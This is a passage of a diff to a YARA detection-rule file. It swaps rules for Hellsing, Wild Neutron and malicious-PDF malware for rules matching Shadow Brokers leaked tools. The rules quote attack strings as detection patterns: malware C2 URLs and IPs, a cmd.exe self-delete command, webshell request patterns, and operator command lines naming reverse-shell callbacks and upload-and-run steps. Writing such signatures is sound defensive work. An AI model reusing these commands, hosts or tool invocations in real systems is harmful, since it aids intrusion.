+		$xr01 = /\.(asp|aspx|jsp|php)\?cmd=[a-z0-9%+\-\/\.]{3,20} HTTP\/1\.[01]["']? 200/
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Bad_PDF : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Auct_Dez16_Strings : FILE
 {
 	meta:
-		description = "Detects PDF that embeds code to steal NTLM hashes"
-		author = "Florian Roth (Nextron Systems), Markus Neis"
-		id = "149cf20c-4cfd-5b07-acc5-06ae25b209b1"
-		date = "2018-05-03"
+		description = "String from the ShodowBroker Files Screenshots - Dec 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b1454c5d-01bc-599b-815c-aa1a3c52be3f"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_bad_pdf.yar#L1-L15"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L11-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "59b159aaccf5c3b64fee17831c1e3a1ca99b60dbb725ad25a4ddad47cdc442d7"
-		score = 65
-		quality = 85
+		logic_hash = "3c632d90c5b26b840b267647faf453f85496b78c900910ad22896698c553c949"
+		score = 60
+		quality = 60
 		tags = "FILE"
-		hash1 = "d8c502da8a2b8d1c67cb5d61428f273e989424f319cfe805541304bdb7b921a8"
 
 	strings:
-		$s1 = "         /F (http//" ascii
-		$s2 = "        /F (\\\\\\\\" ascii
-		$s3 = "<</F (\\\\" ascii
+		$s1 = "bs.ratload" fullword ascii
+		$s2 = "Auditcleaner" fullword ascii
+		$s3 = "bll.perlbind" fullword ascii
+		$s4 = "bll.perlcallback" fullword ascii
+		$s5 = "bll.telnet" fullword ascii
+		$s6 = "bll.tnc.gr" fullword ascii
+		$s7 = "clean_wtmps.py" fullword ascii
+		$s8 = "cmsex.auto" fullword ascii
+		$s9 = "cottonaxe" fullword ascii
+		$s10 = "dectelnet.sh" fullword ascii
+		$s11 = "elatedmonkey" fullword ascii
+		$s12 = "electricslide.pl" fullword ascii
+		$s13 = "endlessdonut" fullword ascii
+		$s14 = "solaris8shellcode" fullword ascii
+		$s15 = "solaris9shellcode" fullword ascii
+		$s16 = "solaris10shellcode" fullword ascii
+		$s17 = "ys.ratload.sh" fullword ascii
+		$elf1 = "catflap" fullword ascii
+		$elf2 = "charm_penguin" fullword ascii
+		$elf3 = "charm_hammer" fullword ascii
+		$elf4 = "charm_saver" fullword ascii
+		$elf5 = "dampcrowd" fullword ascii
+		$elf7 = "dubmoat" fullword ascii
+		$elf8 = "ebbshave" fullword ascii
+		$elf9 = "eggbasket" fullword ascii
+		$elf10 = "toffeehammer" fullword ascii
+		$elf11 = "enemyrun" fullword ascii
+		$elf12 = "envoytomato" fullword ascii
+		$elf13 = "expoxyresin" fullword ascii
+		$elf14 = "estopmoonlit" fullword ascii
+		$elf15 = "linux-exactchange" fullword ascii
+		$elf17 = "ghost_sparc" fullword ascii
+		$elf18 = "jackpop" fullword ascii
+		$elf19 = "orleans_stride" fullword ascii
+		$elf20 = "prokserver" fullword ascii
+		$elf21 = "seconddate" fullword ascii
+		$elf22 = "shentysdelight" fullword ascii
+		$elf23 = "skimcountry" fullword ascii
+		$elf24 = "slyheretic" fullword ascii
+		$elf25 = "stoicsurgeon" fullword ascii
+		$elf26 = "strifeworld" fullword ascii
+		$elf27 = "suaveeyeful" fullword ascii
+		$elf28 = "suctionchar" fullword ascii
+		$elf29 = "vs.attack.linux" fullword ascii
+		$pe1 = "charm_razor" fullword ascii wide
+		$pe2 = "charm_saver" fullword ascii wide
+		$pe3 = "ghost_x86" fullword ascii wide
 
 	condition:
-		( uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x4450250a ) and 1 of them
+		( uint16( 0 ) == 0x457f and 1 of ( $elf* ) ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $pe* ) ) or 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Implantstrings : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Violetspirit
 {
 	meta:
-		description = "detection for Hellsing implants"
-		author = "Kaspersky Lab"
-		id = "00aa5885-ae79-5d68-8587-13d3e8965630"
-		date = "2015-04-07"
+		description = "Auto-generated rule - file violetspirit.README"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4efea734-8cbc-53f7-bf92-5b3253721a81"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L2-L29"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L73-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d62dc766a40d1dc7044cc5c9f07a78d36e231b771fafb52442b26514f4c603db"
+		logic_hash = "01a45feb5c9f9cfe8834306993c53b1e53d79b89b07106ffec0c81cdebb8b71c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
 
 	strings:
-		$a1 = "the file uploaded failed !"
-		$a2 = "ping 127.0.0.1"
-		$b1 = "the file downloaded failed !"
-		$b2 = "common.asp"
-		$c = "xweber_server.exe"
-		$d = "action="
-		$debugpath1 = "d:\\Hellsing\\release\\msger\\" nocase
-		$debugpath2 = "d:\\hellsing\\sys\\xrat\\" nocase
-		$debugpath3 = "D:\\Hellsing\\release\\exe\\" nocase
-		$debugpath4 = "d:\\hellsing\\sys\\xkat\\" nocase
-		$debugpath5 = "e:\\Hellsing\\release\\clare" nocase
-		$debugpath6 = "e:\\Hellsing\\release\\irene\\" nocase
-		$debugpath7 = "d:\\hellsing\\sys\\irene\\" nocase
-		$e = "msger_server.dll"
-		$f = "ServiceMain"
+		$x1 = "-i tgt_ipaddr -h tgt_hostname" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $a* ) ) or ( all of ( $b* ) ) or ( $c and $d ) or ( any of ( $debugpath* ) ) or ( $e and $f ) and filesize < 500000
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Installer : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gr_Gr
 {
 	meta:
-		description = "detection for Hellsing xweber/msger installers"
-		author = "Kaspersky Lab"
-		id = "0aca838e-813a-59ee-8a04-7d2f4e854075"
-		date = "2015-04-07"
+		description = "Auto-generated rule - file gr.notes"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c233159d-8d78-575b-b32b-21f704debfe2"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L31-L54"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L88-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "556898e9507835d93e2cf7e21e997b6e64dc154ac675b429f5f8226bf929309c"
+		logic_hash = "facce45a335d7ca799d68fc26ee2bf5682cec0914502482189cd6aa496cba489"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b2b60dce7a4cfdddbd3d3f1825f1885728956bae009de3a307342fbdeeafcb79"
 
 	strings:
-		$cmd = "cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
-		$a1 = "xweber_install_uac.exe"
-		$a2 = "system32\\cmd.exe" wide
-		$a4 = "S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y="
-		$a5 = "S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg="
-		$a6 = "7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
-		$a7 = "vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw=="
-		$a8 = "vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSINjl2tyI"
-		$a9 = "C:\\Windows\\System32\\sysprep\\sysprep.exe" wide
-		$a10 = "%SystemRoot%\\system32\\cmd.exe" wide
-		$a11 = "msger_install.dll"
-		$a12 = {00 65 78 2E 64 6C 6C 00}
+		$s4 = "delete starting from: (root) LIST (root)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $cmd and ( 2 of ( $a* ) ) ) and filesize < 500000
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Proxytool : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Yellowspirit
 {
 	meta:
-		description = "detection for Hellsing proxy testing tool"
-		author = "Kaspersky Lab"
-		id = "54454f07-11a9-5456-b489-9a9610e53123"
-		date = "2015-04-07"
+		description = "Auto-generated rule - file user.tool.yellowspirit.COMMON"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L56-L74"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8f2656e7b4e6fb5336fb4e39bcec3e99531db532f757b65e3aa12cd2a4334840"
-		score = 50
+		logic_hash = "698b23cc4cc6f319ddef7a93cf7ddc83ffae1d2c2b0a9545011b51e381f8cd0c"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a7c4b718fa92934a9182567288146ffa3312d9f3edc3872478c90e0e2814078c"
 
 	strings:
-		$a1 = "PROXY_INFO: automatic proxy url => %s"
-		$a2 = "PROXY_INFO: connection type => %d"
-		$a3 = "PROXY_INFO: proxy server => %s"
-		$a4 = "PROXY_INFO: bypass list => %s"
-		$a5 = "InternetQueryOption failed with GetLastError() %d"
-		$a6 = "D:\\Hellsing\\release\\exe\\exe\\" nocase
+		$s1 = "-l 19.16.1.1 -i 10.0.3.1 -n 2222 -r nscd -x 9999" fullword ascii
+		$s2 = "-s PITCH_IP -x PITCH_IP -y RHP-24 TARGET_IP" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $a* ) ) and filesize < 300000
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Xkat : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Eleganteagle_Opscript_1_0_0
 {
 	meta:
-		description = "detection for Hellsing xKat tool"
-		author = "Kaspersky Lab"
-		id = "c831ce04-8fb2-5790-8aaf-c88b370835ac"
-		date = "2015-04-07"
+		description = "Auto-generated rule - file eleganteagle_opscript.1.0.0.6"
+		author = "Florian Roth (Nextron Systems)"
+		id = "22855519-160c-57cf-b610-a611ca6813ed"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L76-L97"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L119-L132"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ba74ca11c96e59a04f1cb57b4866df7a581ad94ca81230f2ca5068c8808297aa"
+		logic_hash = "3df5ba1a497ffe5306ed7966f25f69c30a5191e935c5638869a62b3cb2324f70"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "57e223318de0a802874642652b3dc766128f25d7e8f320c6f04c6f2659bb4f7f"
 
 	strings:
-		$a1 = "\\Dbgv.sys"
-		$a2 = "XKAT_BIN"
-		$a3 = "release sys file error."
-		$a4 = "driver_load error. "
-		$a5 = "driver_create error."
-		$a6 = "delete file:%s error."
-		$a7 = "delete file:%s ok."
-		$a8 = "kill pid:%d error."
-		$a9 = "kill pid:%d ok."
-		$a10 = "-pid-delete"
-		$a11 = "kill and delete pid:%d error."
-		$a12 = "kill and delete pid:%d ok."
+		$x3 = "uploadnrun -e \"D=-ucIP_ADDRESS_OF_REDIR" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $a* ) ) and filesize < 300000
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Msgertype2 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Opscript
 {
 	meta:
-		description = "detection for Hellsing msger type 2 implants"
-		author = "Kaspersky Lab"
-		id = "98f151de-c1c2-56c1-8c64-5d1f437e0742"
-		date = "2015-04-07"
+		description = "Auto-generated rule - file opscript.se"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d00752a3-d5c2-53a7-9a83-ad31cfb534af"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L99-L117"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L134-L147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "232e4dfd8d236da223240d9a4ec3f8bfa635d51d7376ff19dfa5579af31fc47f"
+		logic_hash = "23dd6d537a8639bd84ede141cca577dc91328bd293f96f865c7dedd9ef693ee3"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "275c91531a9ac5a240336714093b6aa146b8d7463cb2780cfeeceaea4c789682"
 
 	strings:
-		$a1 = "%s\\system\\%d.txt"
-		$a2 = "_msger"
-		$a3 = "http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
-		$a4 = "http://%s/data/%s.1000001000"
-		$a5 = "/lib/common.asp?action=user_upload&file="
-		$a6 = "%02X-%02X-%02X-%02X-%02X-%02X"
+		$s1 = "ls -l /tmp) | bdes -k 0x4790cae5ec154ccc|" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_Hellsing_Irene : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Shentysdelight
 {
 	meta:
-		description = "detection for Hellsing msger irene installer"
-		author = "Kaspersky Lab"
-		id = "b57d1a10-4e5c-511f-b98c-8ce7d766c227"
-		date = "2015-04-07"
+		description = "Auto-generated rule - file user.tool.shentysdelight.COMMON"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hellsing_kaspersky.yar#L119-L137"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L149-L162"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e7da04083468dba7045b55181642d7cd57d543fbeda24685ba2ac63799740798"
+		logic_hash = "1acfb6aea7e208b7fd52325258219c162482deb4fa7ee87ddc4de0774e3e74f4"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
-		filetype = "PE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a564efeaae9c13fe09a27f2d62208a1dec0a19b4a156f5cfa96a0259366b8166"
 
 	strings:
-		$a1 = "\\Drivers\\usbmgr.tmp" wide
-		$a2 = "\\Drivers\\usbmgr.sys" wide
-		$a3 = "common_loadDriver CreateFile error!"
-		$a4 = "common_loadDriver StartService error && GetLastError():%d!"
-		$a5 = "irene" wide
-		$a6 = "aPLib v0.43 - the smaller the better"
+		$s1 = "echo -ne \"/var/run/COLFILE\\0\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $a* ) ) and filesize < 500000
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_SFX_Runprogram_Wscript : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Epichero
 {
 	meta:
-		description = "Detects suspicious SFX that runs wscript.exe"
+		description = "Auto-generated rule - file user.tool.epichero.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e12cea50-a939-5f69-963c-d6d1cb133e92"
-		date = "2018-09-27"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_sfx.yar#L2-L20"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L164-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0d00d83d4b25d80d0ca44fe1c3f3cd33ae5539d2d79c84bfdfcc470669d4f78c"
+		logic_hash = "36dc38f2dd630f22b87e8d9130de7d40ee3cdba45597b2b667a1a9536d990aad"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "e3bb02c5985fc64759b9c2d3c5474d46237ce472b4a0101c6313dafa939de5a9"
-		hash2 = "0ecf88d4b32895b4819dec3acb62eaaa7035aa6292499d903f76af60fcec0d6a"
-		hash3 = "a7a48f5220bd1ebe04de258d71fdd001711c165d162bd45e8cfbe8964eddf01c"
-		hash4 = "b6fa4889d8a87d45706d92714d716025bf223c01929755321faac1ab0db94a88"
-		hash5 = "7117b39890659c7dd11e15092c5e5ea9495bec0ff2b6e25254f6e343ed6ca33d"
-		hash6 = "ec2afb63555986fa55b7f98ae57c57e1138acb404a0dd2fe4f3d315730b9898e"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "679d194c32cbaead7281df9afd17bca536ee9d28df917b422083ae8ed5b5c484"
 
 	strings:
-		$x1 = "RunProgram=\"wscript.exe" fullword ascii
+		$x2 = "-irtun TARGET_IP ISH_CALLBACK_PORT"
+		$x3 = "-O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_1 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file user.tool.elatedmonkey"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7bcb407f-7f01-540a-852c-a37456270888"
-		date = "2015-07-10"
+		id = "b1ca04e5-bac7-5247-b2d4-82c3515c92fc"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L10-L34"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L180-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
-		logic_hash = "d8044761fa51f2afd16eb096aa9e896483387c47e10ce922f2ef32ebcbd1a520"
-		score = 60
+		logic_hash = "8135c07b8c217e81f7618d58c9c3da6585cdb9b8f7afab85bb6556c5b846ba64"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "98ae935dd9515529a34478cb82644828d94a2d273816d50485665535454e37cd"
 
 	strings:
-		$s0 = "LiveUpdater.exe" fullword wide
-		$s1 = "id-at-postalAddress" fullword ascii
-		$s2 = "%d -> %d (default)" fullword wide
-		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s8 = "id-ce-keyUsage" fullword ascii
-		$s9 = "Key Usage" fullword ascii
-		$s32 = "UPDATE_ID" fullword wide
-		$s37 = "id-at-commonName" fullword ascii
-		$s38 = "2008R2" fullword wide
-		$s39 = "RSA-alt" fullword ascii
-		$s40 = "%02d.%04d.%s" fullword wide
+		$x5 = "ELATEDMONKEY will only work of apache executes scripts" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_2 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Dubmoat
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file user.tool.dubmoat.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1893c251-f81a-5361-91fa-f91a6d1379d2"
-		date = "2015-07-10"
+		id = "d6c0a00b-dda9-587f-a867-f3b632edd494"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L36-L57"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L195-L209"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
-		logic_hash = "3a796199a2e9f2711e5fbdc1050234a8f3c09f762bc645f49a705d9f112d9cdc"
-		score = 60
+		logic_hash = "368c0a6a1db0003e3a2e4ec5e42a5b5563ea1c2cb89db1751226891e1f7181d8"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bcd4ee336050488f5ffeb850d8eaa11eec34d8ba099b370d94d2c83f08a4d881"
 
 	strings:
-		$s0 = "rundll32.exe \"%s\",#1" fullword wide
-		$s1 = "IgfxUpt.exe" fullword wide
-		$s2 = "id-at-postalAddress" fullword ascii
-		$s3 = "Intel(R) Common User Interface" fullword wide
-		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s11 = "Key Usage" fullword ascii
-		$s12 = "Intel Integrated Graphics Updater" fullword wide
-		$s13 = "%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii
+		$s1 = "### Verify version on target:" fullword ascii
+		$s2 = "/current/bin/ExtractData ./utmp > dub.TARGETNAME" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_3 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Strifeworld
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file strifeworld.1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1c5d1442-b2be-5a34-b5c9-78aaf67072c4"
-		date = "2015-07-10"
+		id = "a15c2034-8394-5e62-a5f0-d1506c19e585"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L59-L83"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L211-L225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
-		logic_hash = "16d511412576df2eb6d9646856d37bd94af7648cc602510696b74fa0534e405d"
-		score = 60
+		logic_hash = "2b113b042fd62109ee3ee39515fbd22f3898abf320d75f1288ea88e40b3444c0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "222b00235bf143645ad0d55b2b6839febc5b570e3def00b77699915a7c9cb670"
 
 	strings:
-		$x1 = "178.162.197.9" fullword ascii
-		$x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" fullword wide
-		$s1 = "LiveUpdater.exe" fullword wide
-		$s2 = "id-at-postalAddress" fullword ascii
-		$s3 = "%d -> %d (default)" fullword wide
-		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s5 = "id-at-serialNumber" fullword ascii
-		$s6 = "ECDSA with SHA256" fullword ascii
-		$s7 = "Acer LiveUpdater" fullword wide
+		$s4 = "-p -n.\" strifeworld" fullword ascii
+		$s5 = "Running STRIFEWORLD not protected" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2020KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_4 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Pork
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file user.tool.pork.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52ff5770-1ca4-54d9-b69d-8af0c392084e"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L85-L108"
+		id = "ee5f88b1-6e58-5288-8b80-0d3d188e1ac6"
+		date = "2016-12-17"
+		modified = "2023-12-05"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L227-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
